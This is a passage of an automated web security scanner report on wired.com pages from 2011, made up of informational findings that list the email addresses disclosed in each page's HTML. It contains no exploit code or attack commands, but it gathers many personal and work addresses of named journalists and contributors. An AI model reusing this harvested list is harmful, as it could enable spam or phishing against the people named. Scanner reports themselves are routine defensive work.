<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:danger_room@wired.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:katiedrumm@gmail.com">
...[SNIP]...
<a href="mailto:nohodge@gmail.com">
...[SNIP]...
<a href="mailto:sharonweinberger@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:d_hambling@hotmail.com">
...[SNIP]...
<a href="mailto:nick@nickthompson.com">
...[SNIP]...
<a href="mailto:ArmsControlWonk@gmail.com">
...[SNIP]...
<a href="mailto:armchairgeneralist@yahoo.com">
...[SNIP]...
<a href="mailto:kris.alexander@gmail.com">
...[SNIP]...
<a href="mailto:michael.tanji@threatswatch.org">
...[SNIP]...
<a href="mailto:michael.peck1@gmail.com">
...[SNIP]...

18.20. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

Issue detail

The following email addresses were disclosed in the response:

ArmsControlWonk@gmail.com
armchairgeneralist@yahoo.com
d_hambling@hotmail.com
danger_room@wired.com
david_axe@hotmail.com
katiedrumm@gmail.com
kris.alexander@gmail.com
michael.peck1@gmail.com
michael.tanji@threatswatch.org
nick@nickthompson.com
nohodge@gmail.com
sharonweinberger@gmail.com
spencerackerman@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 09:44:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=427
Expires: Wed, 12 Jan 2011 15:46:00 GMT
Date: Wed, 12 Jan 2011 15:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:danger_room@wired.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:katiedrumm@gmail.com">
...[SNIP]...
<a href="mailto:nohodge@gmail.com">
...[SNIP]...
<a href="mailto:sharonweinberger@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:d_hambling@hotmail.com">
...[SNIP]...
<a href="mailto:nick@nickthompson.com">
...[SNIP]...
<a href="mailto:ArmsControlWonk@gmail.com">
...[SNIP]...
<a href="mailto:armchairgeneralist@yahoo.com">
...[SNIP]...
<a href="mailto:kris.alexander@gmail.com">
...[SNIP]...
<a href="mailto:michael.tanji@threatswatch.org">
...[SNIP]...
<a href="mailto:michael.peck1@gmail.com">
...[SNIP]...

18.21. http://www.wired.com/epicenter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/

Issue detail

The following email addresses were disclosed in the response:

Fred_Vogelstein@wired.com
OliviaSolon@johnabell.com
frank_rose@wired.com
jabell@wired.com
jeff_howe@wired.com
nynews@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
ryanpaul@johnabell.com
shgustin@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:48:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=469
Expires: Wed, 12 Jan 2011 15:46:57 GMT
Date: Wed, 12 Jan 2011 15:39:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:OliviaSolon@johnabell.com">
...[SNIP]...
<a href="mailto:ryanpaul@johnabell.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:OliviaSolon@johnabell.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:jabell@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:jabell@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:Fred_Vogelstein@wired.com">
...[SNIP]...
<a href="mailto:frank_rose@wired.com">
...[SNIP]...
<a href="mailto:jeff_howe@wired.com">
...[SNIP]...
<a href="mailto:nynews@wired.com?subject=Comment from Epicenter Page:">
...[SNIP]...

18.22. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

Issue detail

The following email addresses were disclosed in the response:

Fred_Vogelstein@wired.com
frank_rose@wired.com
jabell@wired.com
jeff_howe@wired.com
nynews@wired.com
ryan_singel@wired.com
shgustin@gmail.com

Request

Response

18.23. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/2011/01/metropcs-net-neutrality/

Issue detail

The following email addresses were disclosed in the response:

Fred_Vogelstein@wired.com
frank_rose@wired.com
jabell@wired.com
jeff_howe@wired.com
nynews@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com

Request

Response

18.24. http://www.wired.com/gadgetlab/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gadgetlab/

Issue detail

The following email addresses were disclosed in the response:

brian_chen@wired.com
gadgetnews@wired.com
mike@wired.com
mike_isaac@wired.com
mjisaac@gmail.com
wired@mistercharlie.co.uk
wired@tweney.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:39:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:23 GMT
Date: Wed, 12 Jan 2011 15:39:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:mjisaac@gmail.com">
...[SNIP]...
<a href="mailto:mjisaac@gmail.com">
...[SNIP]...
<a href="mailto:mjisaac@gmail.com">
...[SNIP]...
<a href="mailto:wired@tweney.com">
...[SNIP]...
<a href="mailto:wired@tweney.com">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:brian_chen@wired.com">
...[SNIP]...
<a href="mailto:mike_isaac@wired.com">
...[SNIP]...
<a href="mailto:mike@wired.com">
...[SNIP]...
<a href="mailto:gadgetnews@wired.com">
...[SNIP]...

18.25. http://www.wired.com/gamelife/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gamelife/

Issue detail

The following email addresses were disclosed in the response:

Lewis_Wallace@wired.com
feitclub@gmail.com
jschreier@gmail.com
plinky92092@gmail.com
wiredkohler@gmail.com

Request

Response

18.26. http://www.wired.com/geekdad/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/geekdad/

Issue detail

The following email addresses were disclosed in the response:

anton@geekdad.com
brad@geekdad.com
canderson@wiredmag.com
chuck@geekdad.com
corrina@geekdad.com
corrinal@cox.net
curtis@geekdad.com
dand@geekdad.com
dave@geekdad.com
doug@geekdad.com
editor@gamepeople.co.uk
fitzwillie@me.com
jason@geekdad.com
jenny@geekdad.com
john@geekdad.com
johnb@geekdad.com
jonathan@geekdad.com
kathy@geekdad.com
ken@geekdad.com
matt@geekdad.com
matthew.d.morgan@gmail.com
michael@geekdad.com
natania@geekdad.com
nathan@geekdad.com
paul@geekdad.com
russ@geekdad.com
tony@geekdad.com
z@geekdad.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:32:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=66
Expires: Wed, 12 Jan 2011 15:40:53 GMT
Date: Wed, 12 Jan 2011 15:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:jenny@geekdad.com">
...[SNIP]...
<a href="mailto:editor@gamepeople.co.uk">
...[SNIP]...
<a href="mailto:fitzwillie@me.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:corrinal@cox.net">
...[SNIP]...
<a href="mailto:z@geekdad.com">
...[SNIP]...
<a href="mailto:matt@geekdad.com">
...[SNIP]...
<a href="mailto:michael@geekdad.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:matthew.d.morgan@gmail.com">
...[SNIP]...
<a href="mailto:jonathan@geekdad.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:nathan@geekdad.com">
...[SNIP]...
<a href="mailto:fitzwillie@me.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:matt@geekdad.com">
...[SNIP]...
<a href="mailto:canderson@wiredmag.com">
...[SNIP]...
<a href="mailto:john@geekdad.com">
...[SNIP]...
<a href="mailto:dave@geekdad.com">
...[SNIP]...
<a href="mailto:natania@geekdad.com">
...[SNIP]...
<a href="mailto:nathan@geekdad.com">
...[SNIP]...
<a href="mailto:johnb@geekdad.com">
...[SNIP]...
<a href="mailto:kathy@geekdad.com">
...[SNIP]...
<a href="mailto:doug@geekdad.com">
...[SNIP]...
<a href="mailto:dand@geekdad.com">
...[SNIP]...
<a href="mailto:paul@geekdad.com">
...[SNIP]...
<a href="mailto:michael@geekdad.com">
...[SNIP]...
<a href="mailto:jason@geekdad.com">
...[SNIP]...
<a href="mailto:corrina@geekdad.com">
...[SNIP]...
<a href="mailto:chuck@geekdad.com">
...[SNIP]...
<a href="mailto:jonathan@geekdad.com">
...[SNIP]...
<a href="mailto:brad@geekdad.com">
...[SNIP]...
<a href="mailto:russ@geekdad.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:curtis@geekdad.com">
...[SNIP]...
<a href="mailto:tony@geekdad.com">
...[SNIP]...
<a href="mailto:jenny@geekdad.com">
...[SNIP]...
<a href="mailto:z@geekdad.com">
...[SNIP]...

18.27. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

Issue detail

The following email addresses were disclosed in the response:

anton@geekdad.com
brad@geekdad.com
canderson@wiredmag.com
chuck@geekdad.com
corrina@geekdad.com
curtis@geekdad.com
dand@geekdad.com
dave@geekdad.com
doug@geekdad.com
fitzwillie@me.com
jason@geekdad.com
jenny@geekdad.com
john@geekdad.com
johnb@geekdad.com
jonathan@geekdad.com
kathy@geekdad.com
ken@geekdad.com
matt@geekdad.com
michael@geekdad.com
natania@geekdad.com
nathan@geekdad.com
paul@geekdad.com
russ@geekdad.com
tony@geekdad.com
z@geekdad.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=447
Expires: Wed, 12 Jan 2011 15:47:21 GMT
Date: Wed, 12 Jan 2011 15:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:fitzwillie@me.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:matt@geekdad.com">
...[SNIP]...
<a href="mailto:canderson@wiredmag.com">
...[SNIP]...
<a href="mailto:john@geekdad.com">
...[SNIP]...
<a href="mailto:dave@geekdad.com">
...[SNIP]...
<a href="mailto:natania@geekdad.com">
...[SNIP]...
<a href="mailto:nathan@geekdad.com">
...[SNIP]...
<a href="mailto:johnb@geekdad.com">
...[SNIP]...
<a href="mailto:kathy@geekdad.com">
...[SNIP]...
<a href="mailto:doug@geekdad.com">
...[SNIP]...
<a href="mailto:dand@geekdad.com">
...[SNIP]...
<a href="mailto:paul@geekdad.com">
...[SNIP]...
<a href="mailto:michael@geekdad.com">
...[SNIP]...
<a href="mailto:jason@geekdad.com">
...[SNIP]...
<a href="mailto:corrina@geekdad.com">
...[SNIP]...
<a href="mailto:chuck@geekdad.com">
...[SNIP]...
<a href="mailto:jonathan@geekdad.com">
...[SNIP]...
<a href="mailto:brad@geekdad.com">
...[SNIP]...
<a href="mailto:russ@geekdad.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:curtis@geekdad.com">
...[SNIP]...
<a href="mailto:tony@geekdad.com">
...[SNIP]...
<a href="mailto:jenny@geekdad.com">
...[SNIP]...
<a href="mailto:z@geekdad.com">
...[SNIP]...

18.28. http://www.wired.com/js/videos/MobileCompatibility.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/js/videos/MobileCompatibility.js

Issue detail

The following email address was disclosed in the response:

ahand@hand-interactive.com

Request

GET /js/videos/MobileCompatibility.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 15:11:05 GMT
Date: Wed, 12 Jan 2011 15:01:05 GMT
Connection: close
Content-Length: 25629

/**
* Copyright (C) 2005 Brightcove, Inc. All Rights Reserved. No
* use, copying or distribution of this work may be made except in
* accordance with a valid license agreement from Brightcove,
...[SNIP]...
*******************************/
/**********************************************************************************************************************/

// JavaScript Document

// Anthony Hand, ahand@hand-interactive.com
// Web: www.hand-interactive.com
//
// License info: http://creativecommons.org/licenses/by/3.0/us/

//Initialize some initial string variables we'll look for later.
var deviceIphone = "iphone"
...[SNIP]...

18.29. http://www.wired.com/magazine/decode/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/magazine/decode/

Issue detail

The following email addresses were disclosed in the response:

britadagostino@yahoo.com
cbaker@wired.com
decodewired@gmail.com
diszaster@gmail.com
drsudoku@gmail.com
mandersen@argn.com
mike@lonesharkgames.com
teeuwynn@lonesharkgames.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:04:48 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:46:19 GMT
Date: Wed, 12 Jan 2011 15:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:diszaster@gmail.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:mandersen@argn.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:mandersen@argn.com">
...[SNIP]...
<a href="mailto:britadagostino@yahoo.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:mike@lonesharkgames.com">
...[SNIP]...
<a href="decodewired@gmail.com">decodewired@gmail.com</a>
...[SNIP]...
<a href="decodewired@gmail.com">decodewired@gmail.com</a>
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:cbaker@wired.com">
...[SNIP]...
<a href="mailto:mike@lonesharkgames.com">
...[SNIP]...
<a href="mailto:teeuwynn@lonesharkgames.com">
...[SNIP]...

18.30. http://www.wired.com/playbook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/playbook/

Issue detail

The following email addresses were disclosed in the response:

brian.mossop@gmail.com
erik_malinowski@wired.com
joe@joelindsey.com
kyle.stack@gmail.com
mark_mcclusky@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:03:45 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=394
Expires: Wed, 12 Jan 2011 15:46:29 GMT
Date: Wed, 12 Jan 2011 15:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:joe@joelindsey.com">
...[SNIP]...
<a href="mailto:kyle.stack@gmail.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:mark_mcclusky@wired.com">
...[SNIP]...
<a href="mailto:brian.mossop@gmail.com">
...[SNIP]...
<a href="mailto:kyle.stack@gmail.com">
...[SNIP]...
<a href="mailto:joe@joelindsey.com">
...[SNIP]...

18.31. http://www.wired.com/rawfile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/rawfile/

Issue detail

The following email addresses were disclosed in the response:

James_Merithew@wired.com
blaark@gmail.com
eecue@eecue.com
heybobg@mac.com
jon_snyder@wired.com
keith@wired.com
lovebryan@gmail.com
mattcalifornia@hotmail.com
matthew_shechmeister@yahoo.com
twigabrook@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:56 GMT
Date: Wed, 12 Jan 2011 15:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:mattcalifornia@hotmail.com">
...[SNIP]...
<a href="mailto:mattcalifornia@hotmail.com">
...[SNIP]...
<a href="mailto:mattcalifornia@hotmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:heybobg@mac.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:keith@wired.com">
...[SNIP]...
<a href="mailto:James_Merithew@wired.com">
...[SNIP]...
<a href="mailto:jon_snyder@wired.com">
...[SNIP]...
<a
href="mailto:matthew_shechmeister@yahoo.com">
...[SNIP]...
<a href="mailto:lovebryan@gmail.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:blaark@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...

18.32. http://www.wired.com/thisdayintech/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/thisdayintech/

Issue detail

The following email addresses were disclosed in the response:

alittlechinmusic@yahoo.com
randy_alfred@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:01:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:12 GMT
Date: Wed, 12 Jan 2011 15:40:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:randy_alfred@wired.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:randy_alfred@wired.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:randy_alfred@wired.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...

18.33. http://www.wired.com/threatlevel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:21:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:52 GMT
Date: Wed, 12 Jan 2011 15:27:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.34. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2006/04/reporter_vs_sub/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.35. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/hacking-the-hacker-stereotypes/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.36. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/transcending-the-human-diy-style/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.37. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.38. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/birgitta-jonsdottir/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.39. http://www.wired.com/threatlevel/2011/01/codebreakers-death/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/codebreakers-death/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.40. http://www.wired.com/threatlevel/2011/01/dubai-assassination/ previous next

Summary

